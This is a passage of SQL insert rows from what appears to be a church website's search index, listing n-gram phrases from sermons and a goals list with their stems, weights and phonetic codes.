(305368, 'personal study of', 'person study of', 0, 1, 1.5667, 'P6254231', 1, '*'),
(305369, 'place in the', 'place in the', 0, 1, 1.4, 'P4253', 1, '*'),
(305370, 'preservation', 'preserv', 0, 0, 0.8, 'P626135', 1, '*'),
(305371, 'preservation is', 'preserv is', 0, 1, 1.5, 'P6261352', 1, '*'),
(305372, 'preservation is in', 'preserv is in', 0, 1, 1.6, 'P62613525', 1, '*'),
(305373, 'problem in', 'problem in', 0, 1, 1.3333, 'P6145', 1, '*'),
(305374, 'problem in most', 'problem in most', 0, 1, 1.5, 'P614523', 1, '*'),
(305375, 'problems between', 'problem between', 0, 1, 1.5333, 'P61452135', 1, '*'),
(305376, 'problems between god', 'problem between god', 0, 1, 1.6667, 'P6145213523', 1, '*'),
(305377, 'prosperity', 'prosper', 0, 0, 0.6667, 'P62163', 1, '*'),
(305378, 'prosperity is', 'prosper is', 0, 1, 1.4333, 'P621632', 1, '*'),
(305379, 'prosperity is secured', 'prosper is secured', 0, 1, 1.7, 'P62163263', 1, '*'),
(305380, 'protection and', 'protect and', 0, 1, 1.4667, 'P632353', 1, '*'),
(305381, 'protection and prosperity', 'protect and prosperity', 0, 1, 1.8333, 'P632353162163', 1, '*'),
(305382, 'provision', 'provis', 0, 0, 0.6, 'P6125', 2, '*'),
(305383, 'provision for', 'provis for', 0, 1, 1.4333, 'P612516', 2, '*'),
(305384, 'provision for life', 'provis for life', 0, 1, 1.6, 'P61251641', 1, '*'),
(305385, 'receive an', 'receiv an', 0, 1, 1.3333, 'R215', 1, '*'),
(305386, 'receive an instruction', 'receiv an instruction', 0, 1, 1.7333, 'R215236235', 1, '*'),
(305387, 'redemption', 'redempt', 0, 0, 0.6667, 'R35135', 1, '*'),
(305388, 'redemption crossed', 'redempt crossed', 0, 1, 1.6, 'R351352623', 1, '*'),
(305389, 'redemption crossed it', 'redempt crossed it', 0, 1, 1.7, 'R351352623', 1, '*'),
(305390, 'result of', 'result of', 0, 1, 1.3, 'R2431', 1, '*'),
(305391, 'result of one', 'result of one', 0, 1, 1.4333, 'R24315', 1, '*'),
(305392, 'rewards obedience', 'reward obedience', 0, 1, 1.5667, 'R321352', 1, '*'),
(305393, 'rewards obedience to', 'reward obedience to', 0, 1, 1.6667, 'R3213523', 1, '*'),
(305394, 'root', 'root', 0, 0, 0.2667, 'R300', 1, '*'),
(305395, 'root of', 'root of', 0, 1, 1.2333, 'R310', 1, '*'),
(305396, 'root of problems', 'root of problems', 0, 1, 1.5333, 'R3161452', 1, '*'),
(305397, 's heart 18', 's heart 18', 0, 1, 1.3333, 'S630', 1, '*'),
(305398, 'same day', 'same day', 0, 1, 1.2667, 'S530', 1, '*'),
(305399, 'same day you', 'same day you', 0, 1, 1.4, 'S530', 1, '*'),
(305400, 'saul because of', 'saul because of', 0, 1, 1.5, 'S4121', 1, '*'),
(305401, 'says if', 'sai if', 0, 1, 1.2333, 'S100', 1, '*'),
(305402, 'says if you', 'sai if you', 0, 1, 1.3667, 'S100', 1, '*'),
(305403, 'secured', 'secur', 0, 0, 0.4667, 'S630', 1, '*'),
(305404, 'secured whenever', 'secur whenever', 0, 1, 1.5333, 'S63516', 1, '*'),
(305405, 'secured whenever you', 'secur whenever you', 0, 1, 1.6667, 'S63516', 1, '*'),
(305406, 'sent me', 'sent me', 0, 1, 1.2333, 'S535', 2, '*'),
(305407, 'sent me to', 'sent me to', 0, 1, 1.3333, 'S5353', 1, '*'),
(305408, 'servants to', 'servant to', 0, 1, 1.3667, 'S615323', 1, '*'),
(305409, 'servants to you', 'servant to you', 0, 1, 1.5, 'S615323', 1, '*'),
(305410, 'shall eat', 'shall eat', 0, 1, 1.3, 'S430', 1, '*'),
(305411, 'shall eat the', 'shall eat the', 0, 1, 1.4333, 'S430', 1, '*'),
(305412, 'shall meet', 'shall meet', 0, 1, 1.3333, 'S453', 1, '*'),
(305413, 'shall meet with', 'shall meet with', 0, 1, 1.5, 'S453', 1, '*'),
(305414, 'sons both', 'son both', 0, 1, 1.3, 'S5213', 1, '*'),
(305415, 'sons both of', 'son both of', 0, 1, 1.4, 'S52131', 1, '*'),
(305416, 'special meetings', 'special meetings', 0, 1, 1.5333, 'S1245352', 1, '*'),
(305417, 'special meetings or', 'special meetings or', 0, 1, 1.6333, 'S12453526', 1, '*'),
(305418, 'structure where', 'structur where', 0, 1, 1.5, 'S36236', 1, '*'),
(305419, 'structure where our', 'structur where our', 0, 1, 1.6333, 'S36236', 1, '*'),
(305420, 'study of', 'studi of', 0, 1, 1.2667, 'S310', 1, '*'),
(305421, 'study of the', 'studi of the', 0, 1, 1.4, 'S313', 1, '*'),
(305422, 'taken lightly', 'taken lightly', 0, 1, 1.4333, 'T254234', 1, '*'),
(305423, 'taken lightly divine', 'taken lightly divine', 0, 1, 1.6667, 'T254234315', 1, '*'),
(305424, 'that crossed', 'that crossed', 0, 1, 1.4, 'T2623', 1, '*'),
(305425, 'that crossed the', 'that crossed the', 0, 1, 1.5333, 'T2623', 1, '*'),
(305426, 'that divine instructions', 'that divine instructions', 0, 1, 1.8, 'T152362352', 1, '*'),
(305427, 'that follow thereafter', 'that follow thereafter', 0, 1, 1.7333, 'T1436136', 1, '*'),
(305428, 'that gets', 'that gets', 0, 1, 1.3, 'T232', 1, '*'),
(305429, 'that gets carried', 'that gets carried', 0, 1, 1.5667, 'T23263', 1, '*'),
(305430, 'that was disobeyed', 'that was disobeyed', 0, 1, 1.6, 'T23213', 1, '*'),
(305431, 'that was what', 'that was what', 0, 1, 1.4333, 'T230', 3, '*'),
(305432, 'the bible very', 'the bible very', 0, 1, 1.4667, 'T1416', 1, '*'),
(305433, 'the devil but', 'the devil but', 0, 1, 1.4333, 'T1413', 1, '*'),
(305434, 'the garden of', 'the garden of', 0, 1, 1.4333, 'T26351', 1, '*'),
(305435, 'the greatest blessings', 'the greatest blessings', 0, 1, 1.7333, 'T2632314252', 1, '*'),
(305436, 'the instructions that', 'the instructions that', 0, 1, 1.7, 'T523623523', 1, '*'),
(305437, 'the kingdom from', 'the kingdom from', 0, 1, 1.5333, 'T25235165', 1, '*'),
(305438, 'the land from', 'the land from', 0, 1, 1.4333, 'T453165', 1, '*'),
(305439, 'the land the', 'the land the', 0, 1, 1.4, 'T453', 1, '*'),
(305440, 'the level we', 'the level we', 0, 1, 1.4, 'T414', 1, '*'),
(305441, 'the lord always', 'the lord always', 0, 1, 1.5, 'T46342', 1, '*'),
(305442, 'the ministry and', 'the ministry and', 0, 1, 1.5333, 'T523653', 1, '*'),
(305443, 'the ministry at', 'the ministry at', 0, 1, 1.5, 'T52363', 1, '*'),
(305444, 'the moves', 'the moves', 0, 1, 1.3, 'T512', 1, '*'),
(305445, 'the moves of', 'the moves of', 0, 1, 1.4, 'T5121', 1, '*'),
(305446, 'the other that', 'the other that', 0, 1, 1.4667, 'T630', 1, '*'),
(305447, 'the root', 'the root', 0, 1, 1.2667, 'T630', 1, '*'),
(305448, 'the root of', 'the root of', 0, 1, 1.3667, 'T631', 1, '*'),
(305449, 'the same day', 'the same day', 0, 1, 1.4, 'T253', 1, '*'),
(305450, 'their place in', 'their place in', 0, 1, 1.4667, 'T61425', 1, '*'),
(305451, 'them died', 'them died', 0, 1, 1.3, 'T530', 1, '*'),
(305452, 'them died on', 'them died on', 0, 1, 1.4, 'T535', 1, '*'),
(305453, 'them form', 'them form', 0, 1, 1.3, 'T5165', 1, '*'),
(305454, 'them form the', 'them form the', 0, 1, 1.4333, 'T51653', 1, '*'),
(305455, 'them over and', 'them over and', 0, 1, 1.4333, 'T51653', 1, '*'),
(305456, 'them when they', 'them when they', 0, 1, 1.4667, 'T530', 1, '*'),
(305457, 'thereafter always', 'thereaft always', 0, 1, 1.5667, 'T613642', 1, '*'),
(305458, 'thereafter always write', 'thereaft always write', 0, 1, 1.7667, 'T61364263', 1, '*'),
(305459, 'they come and', 'thei come and', 0, 1, 1.4333, 'T253', 1, '*'),
(305460, 'through disobedience', 'through disobedience', 0, 1, 1.6667, 'T62321352', 1, '*'),
(305461, 'through disobedience to', 'through disobedience to', 0, 1, 1.7667, 'T623213523', 1, '*'),
(305462, 'through his ordained', 'through his ordained', 0, 1, 1.6667, 'T626353', 1, '*'),
(305463, 'through personal', 'through personal', 0, 1, 1.5333, 'T6216254', 1, '*'),
(305464, 'through personal study', 'through personal study', 0, 1, 1.7333, 'T621625423', 1, '*'),
(305465, 'time to earn', 'time to earn', 0, 1, 1.4, 'T5365', 1, '*'),
(305466, 'to be taken', 'to be taken', 0, 1, 1.3667, 'T1325', 1, '*'),
(305467, 'to divine instruction', 'to divine instruction', 0, 1, 1.7, 'T15236235', 1, '*'),
(305468, 'to divine instructions', 'to divine instructions', 0, 1, 1.7333, 'T152362352', 1, '*'),
(305469, 'to earn', 'to earn', 0, 1, 1.2333, 'T650', 1, '*'),
(305470, 'to earn n', 'to earn n', 0, 1, 1.3, 'T650', 1, '*'),
(305471, 'to his faithfulness', 'to his faithfulness', 0, 1, 1.6333, 'T2131452', 1, '*'),
(305472, 'to his instruction', 'to his instruction', 0, 1, 1.6, 'T25236235', 1, '*'),
(305473, 'to ilesa', 'to ilesa', 0, 1, 1.2667, 'T420', 1, '*'),
(305474, 'to ilesa on', 'to ilesa on', 0, 1, 1.3667, 'T425', 1, '*'),
(305475, 'to lose their', 'to lose their', 0, 1, 1.4333, 'T4236', 1, '*'),
(305476, 'to obey delayed', 'to obey delayed', 0, 1, 1.5, 'T1343', 1, '*'),
(305477, 'to them when', 'to them when', 0, 1, 1.4, 'T500', 1, '*'),
(305478, 'to you take', 'to you take', 0, 1, 1.3667, 'T200', 1, '*'),
(305479, 'to you through', 'to you through', 0, 1, 1.4667, 'T620', 1, '*'),
(305480, 'today i obeyed', 'todai i obeyed', 0, 1, 1.4667, 'T130', 1, '*'),
(305481, 'today in', 'todai in', 0, 1, 1.2667, 'T500', 1, '*'),
(305482, 'today in my', 'todai in my', 0, 1, 1.3667, 'T500', 1, '*'),
(305483, 'today is not', 'todai is not', 0, 1, 1.4, 'T253', 1, '*'),
(305484, 'took the kingdom', 'took the kingdom', 0, 1, 1.5333, 'T2325235', 1, '*'),
(305485, 'tragedy', 'tragedi', 0, 0, 0.4667, 'T623', 1, '*'),
(305486, 'tragedy and', 'tragedi and', 0, 1, 1.3667, 'T62353', 1, '*'),
(305487, 'tragedy and problem', 'tragedi and problem', 0, 1, 1.6333, 'T6235316145', 1, '*'),
(305488, 'two sons', 'two sons', 0, 1, 1.2667, 'T252', 2, '*'),
(305489, 'two sons both', 'two sons both', 0, 1, 1.4333, 'T25213', 1, '*'),
(305490, 'understand that divine', 'understand that divine', 0, 1, 1.7333, 'U536235315', 1, '*'),
(305491, 'us within', 'us within', 0, 1, 1.3, 'U235', 1, '*'),
(305492, 'us within divine', 'us within divine', 0, 1, 1.5333, 'U235315', 1, '*'),
(305493, 'usually', 'usual', 0, 0, 0.4667, 'U240', 1, '*'),
(305494, 'usually becomes', 'usual becomes', 0, 1, 1.5, 'U241252', 1, '*'),
(305495, 'usually becomes outright', 'usual becomes outright', 0, 1, 1.8, 'U2412523623', 1, '*'),
(305496, 'very well everyone', 'veri well everyone', 0, 1, 1.6, 'V64165', 1, '*'),
(305497, 'was disobeyed', 'wa disobeyed', 0, 1, 1.4333, 'W23213', 1, '*'),
(305498, 'was disobeyed ignored', 'wa disobeyed ignored', 0, 1, 1.7, 'W232132563', 1, '*'),
(305499, 'was what', 'wa what', 0, 1, 1.2667, 'W230', 3, '*'),
(305500, 'was what caused', 'wa what caused', 0, 1, 1.5, 'W2323', 1, '*'),
(305501, 'was what cost', 'wa what cost', 0, 1, 1.4333, 'W2323', 1, '*'),
(305502, 'we are today', 'we are today', 0, 1, 1.4, 'W630', 1, '*'),
(305503, 'we continue', 'we continue', 0, 1, 1.3667, 'W2535', 1, '*'),
(305504, 'we continue we', 'we continue we', 0, 1, 1.4667, 'W2535', 1, '*'),
(305505, 'we shall meet', 'we shall meet', 0, 1, 1.4333, 'W2453', 1, '*'),
(305506, 'we would', 'we would', 0, 1, 1.2667, 'W430', 1, '*'),
(305507, 'we would not', 'we would not', 0, 1, 1.4, 'W4353', 1, '*'),
(305508, 'week we would', 'week we would', 0, 1, 1.4333, 'W243', 1, '*'),
(305509, 'well everyone', 'well everyone', 0, 1, 1.4333, 'W4165', 1, '*'),
(305510, 'well everyone that', 'well everyone that', 0, 1, 1.6, 'W41653', 1, '*'),
(305511, 'what caused', 'what caused', 0, 1, 1.3667, 'W323', 1, '*'),
(305512, 'what caused adam', 'what caused adam', 0, 1, 1.5333, 'W3235', 1, '*'),
(305513, 'what cost', 'what cost', 0, 1, 1.3, 'W323', 1, '*'),
(305514, 'what cost eli', 'what cost eli', 0, 1, 1.4333, 'W3234', 1, '*'),
(305515, 'what keeps', 'what keeps', 0, 1, 1.3333, 'W3212', 1, '*'),
(305516, 'what keeps us', 'what keeps us', 0, 1, 1.4333, 'W3212', 1, '*'),
(305517, 'when he sent', 'when he sent', 0, 1, 1.4, 'W5253', 1, '*'),
(305518, 'when they come', 'when they come', 0, 1, 1.4667, 'W5325', 1, '*'),
(305519, 'when you obey', 'when you obey', 0, 1, 1.4333, 'W510', 1, '*'),
(305520, 'whenever you receive', 'whenev you receive', 0, 1, 1.6667, 'W51621', 1, '*'),
(305521, 'where our', 'where our', 0, 1, 1.3, 'W600', 1, '*'),
(305522, 'where our protection', 'where our protection', 0, 1, 1.6667, 'W6163235', 1, '*'),
(305523, 'willing', 'will', 0, 0, 0.4667, 'W452', 1, '*'),
(305524, 'willing and', 'will and', 0, 1, 1.3667, 'W45253', 1, '*'),
(305525, 'willing and obedient', 'will and obedient', 0, 1, 1.6667, 'W452531353', 1, '*'),
(305526, 'with more', 'with more', 0, 1, 1.3, 'W356', 1, '*'),
(305527, 'with more of', 'with more of', 0, 1, 1.4, 'W3561', 1, '*'),
(305528, 'with the moves', 'with the moves', 0, 1, 1.4667, 'W3512', 1, '*'),
(305529, 'within divine', 'within divine', 0, 1, 1.4333, 'W35315', 1, '*'),
(305530, 'within divine structure', 'within divine structure', 0, 1, 1.7667, 'W35315236236', 1, '*'),
(305531, 'without leaving', 'without leaving', 0, 1, 1.5, 'W34152', 1, '*'),
(305532, 'without leaving anyone', 'without leaving anyone', 0, 1, 1.7333, 'W341525', 1, '*'),
(305533, 'without redemption', 'without redemption', 0, 1, 1.6, 'W3635135', 1, '*'),
(305534, 'without redemption crossed', 'without redemption crossed', 0, 1, 1.8667, 'W36351352623', 1, '*'),
(305535, 'witnesses', 'wit', 0, 0, 0.6, 'W352', 1, '*'),
(305536, 'witnesses to', 'wit to', 0, 1, 1.4, 'W3523', 1, '*'),
(305537, 'witnesses to his', 'wit to his', 0, 1, 1.5333, 'W35232', 1, '*'),
(305538, 'would not', 'would not', 0, 1, 1.3, 'W4353', 1, '*'),
(305539, 'would not be', 'would not be', 0, 1, 1.4, 'W43531', 1, '*'),
(305540, 'write down', 'write down', 0, 1, 1.3333, 'W635', 1, '*'),
(305541, 'write down your', 'write down your', 0, 1, 1.5, 'W6356', 1, '*'),
(305542, 'you are willing', 'you are willing', 0, 1, 1.5, 'Y6452', 1, '*'),
(305543, 'you have obeyed', 'you have obeyed', 0, 1, 1.5, 'Y130', 1, '*'),
(305544, 'you obey', 'you obey', 0, 1, 1.2667, 'Y100', 1, '*'),
(305545, 'you obey divine', 'you obey divine', 0, 1, 1.5, 'Y1315', 1, '*'),
(305546, 'you receive an', 'you receive an', 0, 1, 1.4667, 'Y6215', 1, '*'),
(305547, 'you shall eat', 'you shall eat', 0, 1, 1.4333, 'Y243', 1, '*'),
(305548, 'you study', 'you study', 0, 1, 1.3, 'Y230', 1, '*'),
(305549, 'you study the', 'you study the', 0, 1, 1.4333, 'Y230', 1, '*'),
(305550, 'you take heed', 'you take heed', 0, 1, 1.4333, 'Y323', 1, '*'),
(305551, 'you through personal', 'you through personal', 0, 1, 1.6667, 'Y36216254', 1, '*'),
(305552, 'your instructions', 'your instructions', 0, 1, 1.5667, 'Y652362352', 1, '*'),
(305553, 'your instructions and', 'your instructions and', 0, 1, 1.7, 'Y65236235253', 1, '*'),
(305554, 'your life don\'t', 'your life don', 0, 1, 1.5, 'Y641353', 1, '*'),
(305555, 'your obedience for', 'your obedience for', 0, 1, 1.6, 'Y6135216', 1, '*'),
(305556, 'your preservation', 'your preservation', 0, 1, 1.5667, 'Y61626135', 1, '*'),
(305557, 'your preservation is', 'your preservation is', 0, 1, 1.6667, 'Y616261352', 1, '*'),
(305558, 'your provision', 'your provision', 0, 1, 1.4667, 'Y616125', 1, '*'),
(305559, 'your provision for', 'your provision for', 0, 1, 1.6, 'Y61612516', 1, '*'),
(305560, 'yourself to obey', 'yourself to obey', 0, 1, 1.5333, 'Y624131', 1, '*'),
(307582, '25 06', '25 06', 0, 1, 1.1667, '', 1, '*'),
(307583, '25 06 2017', '25 06 2017', 0, 1, 1.3333, '', 1, '*'),
(307584, '53', '53', 0, 0, 0.2, '', 1, '*'),
(307585, '53 embrace', '53 embrace', 0, 1, 1.3333, 'E5162', 1, '*'),
(307586, '53 embrace discipline', '53 embrace discipline', 0, 1, 1.7, 'E516232145', 1, '*'),
(307587, 'a piece ofbread', 'a piece ofbread', 0, 1, 1.5, 'A12163', 1, '*'),
(307588, 'accepting disciplinemay', 'accept disciplinemay', 0, 1, 1.7667, 'A2135232145', 1, '*'),
(307589, 'accepting disciplinemay not', 'accept disciplinemay not', 0, 1, 1.9, 'A21352321453', 1, '*'),
(307590, 'discipline from', 'disciplin from', 0, 1, 1.5, 'D2145165', 1, '*'),
(307591, 'discipline from our', 'disciplin from our', 0, 1, 1.6333, 'D21451656', 1, '*'),
(307592, 'disciplinemay', 'disciplinemai', 0, 0, 0.8667, 'D2145', 1, '*'),
(307593, 'disciplinemay not', 'disciplinemai not', 0, 1, 1.5667, 'D21453', 1, '*'),
(307594, 'disciplinemay not be', 'disciplinemai not be', 0, 1, 1.6667, 'D214531', 1, '*'),
(307595, 'embrace discipline from', 'embrac discipline from', 0, 1, 1.7667, 'E516232145165', 1, '*'),
(307596, 'father\'s heart 25', 'father heart 25', 0, 1, 1.5667, 'F36263', 1, '*'),
(307597, 'heart 25', 'heart 25', 0, 1, 1.2667, 'H630', 1, '*'),
(307598, 'heart 25 06', 'heart 25 06', 0, 1, 1.3667, 'H630', 1, '*'),
(307599, 'item 53', 'item 53', 0, 1, 1.2333, 'I350', 1, '*'),
(307600, 'item 53 embrace', 'item 53 embrace', 0, 1, 1.5, 'I35162', 1, '*'),
(307601, 'k2 item 53', 'k2 item 53', 0, 1, 1.3333, 'K350', 1, '*'),
(307602, 'not be the', 'not be the', 0, 1, 1.3333, 'N313', 1, '*'),
(307603, 'ofbread', 'ofbread', 0, 0, 0.4667, 'O163', 1, '*'),
(307604, 'ofbread discipline', 'ofbread discipline', 0, 1, 1.6, 'O1632145', 1, '*'),
(307605, 'ofbread discipline on', 'ofbread discipline on', 0, 1, 1.7, 'O1632145', 1, '*'),
(307606, 'piece ofbread', 'piec ofbread', 0, 1, 1.4333, 'P2163', 1, '*'),
(307607, 'piece ofbread discipline', 'piec ofbread discipline', 0, 1, 1.8, 'P21632145', 1, '*'),
(307608, 'reproach accepting disciplinemay', 'reproach accepting disciplinemay', 0, 1, 2, 'R162135232145', 1, '*'),
(307609, 's heart 25', 's heart 25', 0, 1, 1.3333, 'S630', 1, '*'),
(312727, '1 build', '1 build', 0, 1, 1.2333, 'B430', 1, '*'),
(312728, '1 build their', '1 build their', 0, 1, 1.4333, 'B436', 1, '*'),
(312729, '10 provide', '10 provide', 0, 1, 1.3333, 'P613', 1, '*'),
(312730, '10 provide quality', '10 provide quality', 0, 1, 1.6, 'P613243', 1, '*'),
(312731, '11 establish', '11 establish', 0, 1, 1.4, 'E23142', 1, '*'),
(312732, '11 establish at', '11 establish at', 0, 1, 1.5, 'E231423', 1, '*'),
(312733, '12 souls', '12 souls', 0, 1, 1.2667, 'S420', 1, '*'),
(312734, '12 souls personally', '12 souls personally', 0, 1, 1.6333, 'S4216254', 1, '*'),
(312735, '12 take', '12 take', 0, 1, 1.2333, 'T200', 1, '*'),
(312736, '12 take your', '12 take your', 0, 1, 1.4, 'T260', 1, '*'),
(312737, '13 pray', '13 pray', 0, 1, 1.2333, 'P600', 1, '*'),
(312738, '13 pray at', '13 pray at', 0, 1, 1.3333, 'P630', 1, '*'),
(312739, '14 read', '14 read', 0, 1, 1.2333, 'R300', 1, '*'),
(312740, '14 read through', '14 read through', 0, 1, 1.5, 'R362', 1, '*'),
(312741, '15 don\'t', '15 don', 0, 1, 1.2667, 'D530', 1, '*'),
(312742, '15 don\'t miss', '15 don miss', 0, 1, 1.4333, 'D5352', 1, '*'),
(312743, '16 acquire', '16 acquire', 0, 1, 1.3333, 'A260', 1, '*'),
(312744, '16 acquire an', '16 acquire an', 0, 1, 1.4333, 'A265', 1, '*'),
(312745, '17 be a', '17 be a', 0, 1, 1.2333, 'B000', 1, '*'),
(312746, '2 pay', '2 pay', 0, 1, 1.1667, 'P000', 1, '*'),
(312747, '2 pay off', '2 pay off', 0, 1, 1.3, 'P000', 1, '*'),
(312748, '3 have', '3 have', 0, 1, 1.2, 'H100', 1, '*'),
(312749, '3 have a', '3 have a', 0, 1, 1.2667, 'H100', 1, '*'),
(312750, '4 establish', '4 establish', 0, 1, 1.3667, 'E23142', 1, '*'),
(312751, '4 establish an', '4 establish an', 0, 1, 1.4667, 'E231425', 1, '*'),
(312752, '5 become', '5 become', 0, 1, 1.2667, 'B250', 1, '*'),
(312753, '5 become a', '5 become a', 0, 1, 1.3333, 'B250', 1, '*'),
(312754, '52 sunday', '52 sunday', 0, 1, 1.3, 'S530', 1, '*'),
(312755, '52 sunday services', '52 sunday services', 0, 1, 1.6, 'S532612', 1, '*'),
(312756, '54', '54', 0, 0, 0.2, '', 1, '*'),
(312757, '54 divine', '54 divine', 0, 1, 1.3, 'D150', 1, '*'),
(312758, '54 divine agenda', '54 divine agenda', 0, 1, 1.5333, 'D15253', 1, '*'),
(312759, '6 months\'', '6 months', 0, 1, 1.3, 'M320', 1, '*'),
(312760, '6 months\' salary', '6 months salary', 0, 1, 1.5333, 'M3246', 1, '*'),
(312761, '6 win', '6 win', 0, 1, 1.1667, 'W500', 1, '*'),
(312762, '6 win a', '6 win a', 0, 1, 1.2333, 'W500', 1, '*'),
(312763, '7 complete', '7 complete', 0, 1, 1.3333, 'C5143', 1, '*'),
(312764, '7 complete mimmp', '7 complete mimmp', 0, 1, 1.5333, 'C514351', 1, '*'),
(312765, '8 don\'t', '8 don', 0, 1, 1.2333, 'D530', 2, '*'),
(312766, '8 don\'t miss', '8 don miss', 0, 1, 1.4, 'D5352', 1, '*'),
(312767, '9 attend', '9 attend', 0, 1, 1.2667, 'A353', 1, '*'),
(312768, '9 attend 52', '9 attend 52', 0, 1, 1.3667, 'A353', 1, '*'),
(312769, 'a bible', 'a bible', 0, 1, 1.2333, 'A140', 1, '*'),
(312770, 'a bible study', 'a bible study', 0, 1, 1.4333, 'A1423', 1, '*'),
(312771, 'a day', 'a day', 0, 1, 1.1667, 'A300', 1, '*'),
(312772, 'a day 14', 'a day 14', 0, 1, 1.2667, 'A300', 1, '*'),
(312773, 'a family unit', 'a family unit', 0, 1, 1.4333, 'A15453', 1, '*'),
(312774, 'a fun', 'a fun', 0, 1, 1.1667, 'A150', 1, '*'),
(312775, 'a fun weekend', 'a fun weekend', 0, 1, 1.4333, 'A15253', 1, '*'),
(312776, 'a genuine reason', 'a genuine reason', 0, 1, 1.5333, 'A25625', 1, '*'),
(312777, 'a minimum', 'a minimum', 0, 1, 1.3, 'A500', 1, '*'),
(312778, 'a minimum of', 'a minimum of', 0, 1, 1.4, 'A510', 1, '*'),
(312779, 'a saving', 'a saving', 0, 1, 1.2667, 'A2152', 1, '*'),
(312780, 'a saving equivalent', 'a saving equivalent', 0, 1, 1.6333, 'A21521453', 1, '*'),
(312781, 'a segment', 'a segment', 0, 1, 1.3, 'A253', 1, '*'),
(312782, 'a segment of', 'a segment of', 0, 1, 1.4, 'A2531', 1, '*'),
(312783, 'a tithe', 'a tithe', 0, 1, 1.2333, 'A300', 1, '*'),
(312784, 'a tithe 16', 'a tithe 16', 0, 1, 1.3333, 'A300', 1, '*'),
(312785, 'acquire an', 'acquir an', 0, 1, 1.3333, 'A265', 1, '*'),
(312786, 'acquire an additional', 'acquir an additional', 0, 1, 1.7, 'A265354', 1, '*'),
(312787, 'added to church', 'ad to church', 0, 1, 1.5, 'A3262', 1, '*'),
(312788, 'additional', 'addit', 0, 0, 0.6667, 'A354', 1, '*'),
(312789, 'additional skill', 'addit skill', 0, 1, 1.5333, 'A35424', 1, '*'),
(312790, 'additional skill this', 'addit skill this', 0, 1, 1.7, 'A3542432', 1, '*'),
(312791, 'additional stream', 'addit stream', 0, 1, 1.5667, 'A3542365', 1, '*'),
(312792, 'additional stream of', 'addit stream of', 0, 1, 1.6667, 'A35423651', 1, '*'),
(312793, 'agenda for', 'agenda for', 0, 1, 1.3333, 'A25316', 1, '*'),
(312794, 'agenda for dream', 'agenda for dream', 0, 1, 1.5333, 'A25316365', 1, '*'),
(312795, 'agenda item', 'agenda item', 0, 1, 1.3667, 'A2535', 1, '*'),
(312796, 'agenda item 54', 'agenda item 54', 0, 1, 1.4667, 'A2535', 1, '*'),
(312797, 'all debts', 'all debts', 0, 1, 1.3, 'A43132', 1, '*'),
(312798, 'all debts 3', 'all debts 3', 0, 1, 1.3667, 'A43132', 1, '*'),
(312799, 'an additional', 'an additional', 0, 1, 1.4333, 'A5354', 1, '*'),
(312800, 'an additional skill', 'an additional skill', 0, 1, 1.6333, 'A535424', 1, '*'),
(312801, 'an ngo', 'an ngo', 0, 1, 1.2, 'A520', 1, '*'),
(312802, 'an ngo to', 'an ngo to', 0, 1, 1.3, 'A523', 1, '*'),
(312803, 'and added', 'and added', 0, 1, 1.3, 'A530', 1, '*'),
(312804, 'and added to', 'and added to', 0, 1, 1.4, 'A530', 1, '*'),
(312805, 'and in kind', 'and in kind', 0, 1, 1.3667, 'A535253', 1, '*'),
(312806, 'apart from salary', 'apart from salary', 0, 1, 1.5667, 'A163165246', 1, '*'),
(312807, 'at least one', 'at least one', 0, 1, 1.4, 'A34235', 1, '*'),
(312808, 'attend 52', 'attend 52', 0, 1, 1.3, 'A353', 1, '*'),
(312809, 'attend 52 sunday', 'attend 52 sunday', 0, 1, 1.5333, 'A353253', 1, '*'),
(312810, 'away from home', 'awai from home', 0, 1, 1.4667, 'A165', 1, '*'),
(312811, 'be a part', 'be a part', 0, 1, 1.3, 'B630', 1, '*'),
(312812, 'become a family', 'becom a family', 0, 1, 1.5, 'B25154', 1, '*'),
(312813, 'bible in', 'bibl in', 0, 1, 1.2667, 'B450', 1, '*'),
(312814, 'bible in the', 'bibl in the', 0, 1, 1.4, 'B453', 1, '*'),
(312815, 'bible study service', 'bibl study service', 0, 1, 1.6333, 'B4232612', 1, '*'),
(312816, 'build their', 'build their', 0, 1, 1.3667, 'B436', 1, '*'),
(312817, 'build their house', 'build their house', 0, 1, 1.5667, 'B4362', 1, '*'),
(312818, 'building in', 'build in', 0, 1, 1.3667, 'B43525', 1, '*'),
(312819, 'building in cash', 'build in cash', 0, 1, 1.5333, 'B435252', 1, '*'),
(312820, 'cash and', 'cash and', 0, 1, 1.2667, 'C530', 1, '*'),
(312821, 'cash and in', 'cash and in', 0, 1, 1.3667, 'C535', 1, '*'),
(312822, 'centre man', 'centr man', 0, 1, 1.3333, 'C5365', 1, '*'),
(312823, 'centre man should', 'centr man should', 0, 1, 1.5667, 'C5365243', 1, '*'),
(312824, 'centre men', 'centr men', 0, 1, 1.3333, 'C5365', 1, '*'),
(312825, 'christ 5', 'christ 5', 0, 1, 1.2667, 'C623', 1, '*'),
(312826, 'christ 5 become', 'christ 5 become', 0, 1, 1.5, 'C623125', 1, '*'),
(312827, 'church 7 complete', 'church 7 complete', 0, 1, 1.5667, 'C625143', 1, '*'),
(312828, 'complete mimmp', 'complet mimmp', 0, 1, 1.4667, 'C514351', 1, '*'),
(312829, 'complete mimmp this', 'complet mimmp this', 0, 1, 1.6333, 'C51435132', 1, '*'),
(312830, 'current', 'current', 0, 0, 0.4667, 'C653', 1, '*'),
(312831, 'current source', 'current source', 0, 1, 1.4667, 'C653262', 1, '*'),
(312832, 'current source 12', 'current source 12', 0, 1, 1.5667, 'C653262', 1, '*'),
(312833, 'day 14', 'dai 14', 0, 1, 1.2, 'D000', 1, '*'),
(312834, 'day 14 read', 'dai 14 read', 0, 1, 1.3667, 'D630', 1, '*'),
(312835, 'debts', 'debt', 0, 0, 0.3333, 'D132', 1, '*'),
(312836, 'debts 3', 'debt 3', 0, 1, 1.2333, 'D132', 1, '*'),
(312837, 'debts 3 have', 'debt 3 have', 0, 1, 1.4, 'D1321', 1, '*'),
(312838, 'divine agenda', 'divin agenda', 0, 1, 1.4333, 'D15253', 1, '*'),
(312839, 'divine agenda for', 'divin agenda for', 0, 1, 1.5667, 'D1525316', 1, '*'),
(312840, 'divine agenda item', 'divin agenda item', 0, 1, 1.6, 'D152535', 1, '*'),
(312841, 'don\'t miss', 'don miss', 0, 1, 1.3333, 'D5352', 1, '*'),
(312842, 'don\'t miss a', 'don miss a', 0, 1, 1.4, 'D5352', 1, '*'),
(312843, 'dream centre man', 'dream centre man', 0, 1, 1.5333, 'D6525365', 1, '*'),
(312844, 'dream centre men', 'dream centre men', 0, 1, 1.5333, 'D6525365', 1, '*'),
(312845, 'equivalent', 'equival', 0, 0, 0.6667, 'E21453', 1, '*'),
(312846, 'equivalent to', 'equival to', 0, 1, 1.4333, 'E21453', 1, '*'),
